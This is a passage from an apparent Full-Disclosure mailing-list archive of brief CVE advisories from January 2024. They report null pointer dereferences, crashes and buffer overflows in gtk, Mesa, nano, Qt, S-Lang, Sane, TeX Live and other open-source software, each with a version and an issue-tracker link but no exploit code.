the name CVE-2023-45922 to this vulnerability.


[FD] NULL pointer dereference in XIQueryDevice() of gnome gtk

2024-01-26 Thread Meng Ruijie
[Vulnerability description]
gnome gtk 824e9833 was discovered to contain a NULL pointer dereference via the 
function XIQueryDevice().

[VulnerabilityType Other]
null pointer dereference

[Vendor of Product]
gnome

[Affected Product Code Base]
gtk - 824e9833

[Reference]
https://gitlab.gnome.org/GNOME/gtk/-/issues/5962

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45923 to this vulnerability.


[FD] NULL pointer dereference in glXGetDrawableScreen() of OpenGL libglvnd

2024-01-26 Thread Meng Ruijie
[Vulnerability description]
OpenGL libglvnd bb06db5a was discovered to contain a NULL pointer dereference 
via the function glXGetDrawableScreen().

[Vulnerability Type]
Buffer Overflow

[Vendor of Product]
OpenGL

[Affected Product Code Base]
libglvnd - bb06db5a

[Reference]
https://gitlab.freedesktop.org/glvnd/libglvnd/-/issues/242

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45924 to this vulnerability.


[FD] null pointer dereference in GNU Midnight at /tty/x11conn.c

2024-01-26 Thread Meng Ruijie
[Vulnerability description]
GNU Midnight Commander v4.8.29-146-g299d9a2fb was discovered to contain a 
segmentation violation via the function x_error_handler() at /tty/x11conn.c.

[VulnerabilityType Other]
null pointer dereference

[Vendor of Product]
GNU

[Affected Product Code Base]
Midnight Commander - 4.8.29-146-g299d9a2fb

[Reference]
https://midnight-commander.org/ticket/4484

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45925 to this vulnerability.


[FD] null pointer dereference in gnome gdk-pixbuf

2024-01-26 Thread Meng Ruijie
[Vulnerability description]
gnome gdk-pixbuf 4fc028aa was discovered to contain a segmentation violation 
via the function gdk_pixbuf_io_init_modules().

[VulnerabilityType Other]
null pointer dereference

[Vendor of Product]
gnome

[Affected Product Code Base]
gdk-pixbuf - 4fc028aa

[Reference]
https://gitlab.gnome.org/GNOME/gdk-pixbuf/-/issues/230

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45926 to this vulnerability.


[FD] arithmetic exception in S-lang via the function tt_sprintf()

2024-01-26 Thread Meng Ruijie
[Vulnerability description]
S-Lang v2.3.2 was discovered to contain an arithmetic exception via the 
function tt_sprintf().

[VulnerabilityType Other]
FPE

[Vendor of Product]
S-Lang

[Affected Product Code Base]
S-Lang - 2.3.2

[Reference]
http://lists.jedsoft.org/lists/slang-users/2023/003.html

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45927 to this vulnerability.


[FD] null pointer dereference in gnome gtk via init_randr15() at gdkscreen-x11.c

2024-01-26 Thread Meng Ruijie
[Vulnerability description]
gnome gtk f2a28891 was discovered to contain a segmentation violation via the 
function init_randr15() at gdkscreen-x11.c.

[VulnerabilityType Other]
null pointer dereference

[Vendor of Product]
gnome

[Affected Product Code Base]
gtk - f2a28891

[Reference]
https://gitlab.gnome.org/GNOME/gtk/-/issues/5984

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45928 to this vulnerability.


[FD] SEGV in S-Lang via fixup_tgetstr()

2024-01-26 Thread Meng Ruijie
[Vulnerability description]
S-Lang v2.3.2 was discovered to contain a SEGV via the function fixup_tgetstr().

[VulnerabilityType Other]
SEGV

[Vendor of Product]
S-Lang

[Affected Product Code Base]
S-Lang - 2.3.2

[Reference]
http://lists.jedsoft.org/lists/slang-users/2023/002.html

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45929 to this vulnerability.


[FD] null pointer dereference in gnome gtk via parse_settings() at xsettings-client.c

2024-01-26 Thread Meng Ruijie
[Vulnerability description]
gnome gtk ac60bc60 was discovered to contain a segmentation violation via the 
function parse_settings() at xsettings-client.c.

[VulnerabilityType Other]
null pointer dereference

[Vendor of Product]
gnome

[Affected Product Code Base]
gtk - ac60bc60

[Reference]
https://gitlab.gnome.org/GNOME/gtk/-/issues/5983

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45930 to this vulnerability.


[FD] NULL pointer dereference in freedesktop Mesa via check_xshm()

2024-01-26 Thread Meng Ruijie
[Vulnerability description]
freedesktop Mesa v23.0.4 was discovered to contain a NULL pointer dereference 
via the function check_xshm().

[Vulnerability Type]
NULL pointer dereference

[Vendor of Product]
freedesktop

[Affected Product Code Base]
Mesa - 23.0.4

[Reference]
https://gitlab.freedesktop.org/mesa/mesa/-/issues/9859

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45931 to this vulnerability.


[FD] null pointer dereference in nano via read_the_list()

2024-01-26 Thread Meng Ruijie
[Vulnerability description]
Nano v6.2 was discovered to contain a segmentation violation via the function 
read_the_list().

[VulnerabilityType Other]
null pointer dereference

[Vendor of Product]
nano

[Affected Product Code Base]
nano - 6.2

[Reference]
https://savannah.gnu.org/bugs/index.php?64465

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45932 to this vulnerability.


[FD] NULL pointer dereference in QT via the function QXcbConnection::initializeAllAtoms()

2024-01-26 Thread Meng Ruijie
[Vulnerability description]
QT v6.2, v6.5, and v6.6 were discovered to contain a NULL pointer dereference 
via the function QXcbConnection::initializeAllAtoms().

[VulnerabilityType Other]
null pointer dereference

[Vendor of Product]
qt

[Affected Product Code Base]
qt - 6.6, 6.5, 6.2

[Reference]
https://bugreports.qt.io/browse/QTBUG-115599

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-45935 to this vulnerability.


[FD] Buffer Overflow in graphviz via a crafted config6a file

2024-01-26 Thread Meng Ruijie
[Vulnerability description]
Buffer Overflow vulnerability in graphviz v.2.43.0 allows a remote attacker to 
execute arbitrary code via a crafted config6a file.

[Vulnerability Type]
Buffer Overflow

[Vendor of Product]
graphviz

[Affected Product Code Base]
graphviz - 2.43.0

[Reference]
https://gitlab.com/graphviz/graphviz/-/issues/2441

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-46045 to this vulnerability.


[FD] null pointer dereference in MiniZinc via a crafted .mzn file

2024-01-26 Thread Meng Ruijie
[Vulnerability description]
A null pointer dereference happens in MiniZinc v.2.7.6 via a crafted .mzn file.

[VulnerabilityType Other]
null pointer dereference

[Vendor of Product]
MiniZinc

[Affected Product Code Base]
MiniZinc - 2.7.6

[Reference]
https://github.com/MiniZinc/libminizinc/issues/730

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-46046 to this vulnerability.


[FD] null pointer dereference in Sane via a crafted config file

2024-01-26 Thread Meng Ruijie
[Vulnerability description]
A null pointer dereference occurred in Sane v.1.2.1 via a crafted config file to 
the sanei_configure_attach() function.

[VulnerabilityType Other]
null pointer dereference

[Vendor of Product]
sane

[Affected Product Code Base]
sane - 1.2.1

[Reference]
https://gitlab.com/sane-project/backends/-/issues/708

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-46047 to this vulnerability.


[FD] null pointer dereference in tex-live via a crafted cmr10.pfb

2024-01-26 Thread Meng Ruijie
[Vulnerability description]
A null pointer dereference occurred in tex-live 944e257 via a crafted cmr10.pfb 
config file.

[VulnerabilityType Other]
null pointer dereference

[Vendor of Product]
tex-live

[Affected Product Code Base]
tex-live - 944e257

[Reference]
https://tug.org/pipermail/tex-live/2023-August/049400.html

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-46048 to this vulnerability.


[FD] null pointer dereference in LLVM

2024-01-26 Thread Meng Ruijie
[Vulnerability description]
A null pointer dereference existed in LLVM v.15.0.0 via a crafted pdflatex.fmt 
file.

[VulnerabilityType Other]
null pointer dereference

[Vendor of Product]
llvm

[Affected Product Code Base]
llvm - LLVM-15

[Reference]
https://github.com/llvm/llvm-project/issues/67388

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-46049 to this vulnerability.


[FD] null pointer dereference in MiniZinc via a crafted Preferences.json file

2024-01-26 Thread Meng Ruijie
[Vulnerability description]
A null pointer dereference existed in MiniZinc v.2.7.6 via a crafted 
Preferences.json file.

[VulnerabilityType Other]
null pointer dereference

[Vendor of Product]
MiniZinc

[Affected Product Code Base]
MiniZinc - 2.7.6

[Reference]
https://github.com/MiniZinc/libminizinc/issues/729

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-46050 to this vulnerability.


[FD] null pointer dereference in tex-live

2024-01-26 Thread Meng Ruijie
[Vulnerability description]
A null pointer dereference existed in tex-live v.944e257 via a crafted file to 
the texk/web2c/pdftexdir/tounicode.c function.

[VulnerabilityType Other]
null pointer dereference

[Vendor of Product]
tex-live

[Affected Product Code Base]
tex-live - 944e257

[Reference]
https://tug.org/pipermail/tex-live/2023-August/049406.html

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-46051 to this vulnerability.


[FD] Buffer overflow in Sane

2024-01-26 Thread Meng Ruijie
[Vulnerability description]
A buffer overflow existed in Sane v.1.2.1 via a crafted config file to the 
init_options() function.

[Vulnerability Type]
Buffer Overflow

[Vendor of Product]
sane

[Affected Product Code Base]
sane - 1.2.1

[Reference]
https://gitlab.com/sane-project/backends/-/issues/709

[CVE Reference]
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned 
the name CVE-2023-46052 to this vulnerability.